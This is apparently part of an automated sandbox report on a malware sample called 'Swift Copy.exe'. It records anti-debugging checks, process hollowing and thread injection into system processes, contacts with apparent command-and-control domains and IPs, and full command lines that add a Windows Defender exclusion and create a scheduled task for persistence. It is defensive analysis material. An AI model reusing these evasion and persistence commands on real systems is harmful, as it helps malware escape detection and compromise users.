Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D3D34 mov eax, dword ptr fs:[00000030h] 8_2_018D3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CAD30 mov eax, dword ptr fs:[00000030h] 8_2_018CAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01903D43 mov eax, dword ptr fs:[00000030h] 8_2_01903D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01943540 mov eax, dword ptr fs:[00000030h] 8_2_01943540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01973D40 mov eax, dword ptr fs:[00000030h] 8_2_01973D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E7D50 mov eax, dword ptr fs:[00000030h] 8_2_018E7D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EC577 mov eax, dword ptr fs:[00000030h] 8_2_018EC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EC577 mov eax, dword ptr fs:[00000030h] 8_2_018EC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D849B mov eax, dword ptr fs:[00000030h] 8_2_018D849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01998CD6 mov eax, dword ptr fs:[00000030h] 8_2_01998CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019814FB mov eax, dword ptr fs:[00000030h] 8_2_019814FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946CF0 mov eax, dword ptr fs:[00000030h] 8_2_01946CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946CF0 mov eax, dword ptr fs:[00000030h] 8_2_01946CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946CF0 mov eax, dword ptr fs:[00000030h] 8_2_01946CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0199740D mov eax, dword ptr fs:[00000030h] 8_2_0199740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0199740D mov eax, dword ptr fs:[00000030h] 8_2_0199740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0199740D mov eax, dword ptr fs:[00000030h] 8_2_0199740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981C06 mov eax, dword ptr fs:[00000030h] 8_2_01981C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h] 8_2_01946C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h] 8_2_01946C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h] 8_2_01946C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01946C0A mov eax, dword ptr fs:[00000030h] 8_2_01946C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FBC2C mov eax, dword ptr fs:[00000030h] 8_2_018FBC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FA44B mov eax, dword ptr fs:[00000030h] 8_2_018FA44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195C450 mov eax, dword ptr fs:[00000030h] 8_2_0195C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195C450 mov eax, dword ptr fs:[00000030h] 8_2_0195C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E746D mov eax, dword ptr fs:[00000030h] 8_2_018E746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FAC7B mov eax, dword ptr fs:[00000030h] 8_2_018FAC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01947794 mov eax, dword ptr fs:[00000030h] 8_2_01947794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01947794 mov eax, dword ptr fs:[00000030h] 8_2_01947794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01947794 mov eax, dword ptr fs:[00000030h] 8_2_01947794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D8794 mov eax, dword ptr fs:[00000030h] 8_2_018D8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019037F5 mov eax, dword ptr fs:[00000030h] 8_2_019037F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FA70E mov eax, dword ptr fs:[00000030h] 8_2_018FA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FA70E mov eax, dword ptr fs:[00000030h] 8_2_018FA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195FF10 mov eax, dword ptr fs:[00000030h] 8_2_0195FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195FF10 mov eax, dword ptr fs:[00000030h] 8_2_0195FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0199070D mov eax, dword ptr fs:[00000030h] 8_2_0199070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0199070D mov eax, dword ptr fs:[00000030h] 8_2_0199070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EF716 mov eax, dword ptr fs:[00000030h] 8_2_018EF716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C4F2E mov eax, dword ptr fs:[00000030h] 8_2_018C4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C4F2E mov eax, dword ptr fs:[00000030h] 8_2_018C4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EB73D mov eax, dword ptr fs:[00000030h] 8_2_018EB73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EB73D mov eax, dword ptr fs:[00000030h] 8_2_018EB73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FE730 mov eax, dword ptr fs:[00000030h] 8_2_018FE730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DEF40 mov eax, dword ptr fs:[00000030h] 8_2_018DEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DFF60 mov eax, dword ptr fs:[00000030h] 8_2_018DFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01998F6A mov eax, dword ptr fs:[00000030h] 8_2_01998F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195FE87 mov eax, dword ptr fs:[00000030h] 8_2_0195FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019446A7 mov eax, dword ptr fs:[00000030h] 8_2_019446A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01990EA5 mov eax, dword ptr fs:[00000030h] 8_2_01990EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01990EA5 mov eax, dword ptr fs:[00000030h] 8_2_01990EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01990EA5 mov eax, dword ptr fs:[00000030h] 8_2_01990EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F36CC mov eax, dword ptr fs:[00000030h] 8_2_018F36CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01998ED6 mov eax, dword ptr fs:[00000030h] 8_2_01998ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0197FEC0 mov eax, dword ptr fs:[00000030h] 8_2_0197FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01908EC7 mov eax, dword ptr fs:[00000030h] 8_2_01908EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F16E0 mov ecx, dword ptr fs:[00000030h] 8_2_018F16E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D76E2 mov eax, dword ptr fs:[00000030h] 8_2_018D76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CC600 mov eax, dword ptr fs:[00000030h] 8_2_018CC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CC600 mov eax, dword ptr fs:[00000030h] 8_2_018CC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CC600 mov eax, dword ptr fs:[00000030h] 8_2_018CC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F8E00 mov eax, dword ptr fs:[00000030h] 8_2_018F8E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981608 mov eax, dword ptr fs:[00000030h] 8_2_01981608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FA61C mov eax, dword ptr fs:[00000030h] 8_2_018FA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FA61C mov eax, dword ptr fs:[00000030h] 8_2_018FA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0197FE3F mov eax, dword ptr fs:[00000030h] 8_2_0197FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CE620 mov eax, dword ptr fs:[00000030h] 8_2_018CE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h] 8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h] 8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h] 8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h] 8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h] 8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D7E41 mov eax, dword ptr fs:[00000030h] 8_2_018D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198AE44 mov eax, dword ptr fs:[00000030h] 8_2_0198AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198AE44 mov eax, dword ptr fs:[00000030h] 8_2_0198AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D766D mov eax, dword ptr fs:[00000030h] 8_2_018D766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h] 8_2_018EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h] 8_2_018EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h] 8_2_018EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h] 8_2_018EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EAE73 mov eax, dword ptr fs:[00000030h] 8_2_018EAE73
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019099A0 NtCreateSection,LdrInitializeThunk, 8_2_019099A0
Source: C:\Users\user\Desktop\Swift Copy.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 103.92.235.55 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.mogdento.com
Source: C:\Windows\explorer.exe Network Connect: 103.67.235.120 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.3.130.2 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 85.159.66.93 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.kinemartigues.com
Source: C:\Windows\explorer.exe Network Connect: 51.159.175.169 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.blackyaga.xyz
Source: C:\Windows\explorer.exe Domain query: www.epic45.co.uk
Source: C:\Windows\explorer.exe Domain query: www.expectedclosure.one
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 370000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Swift Copy.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 10F1008 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Swift Copy.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 3968 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3968 Jump to behavior
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: explorer.exe, 0000000B.00000000.380716731.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.334501812.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.287445550.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.339209169.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.306173518.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.318298051.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.335155512.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.318298051.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.335155512.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.381188687.0000000000708000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.317860532.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.287493311.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 0000000B.00000000.381862070.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.318298051.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.335155512.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Users\user\Desktop\Swift Copy.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
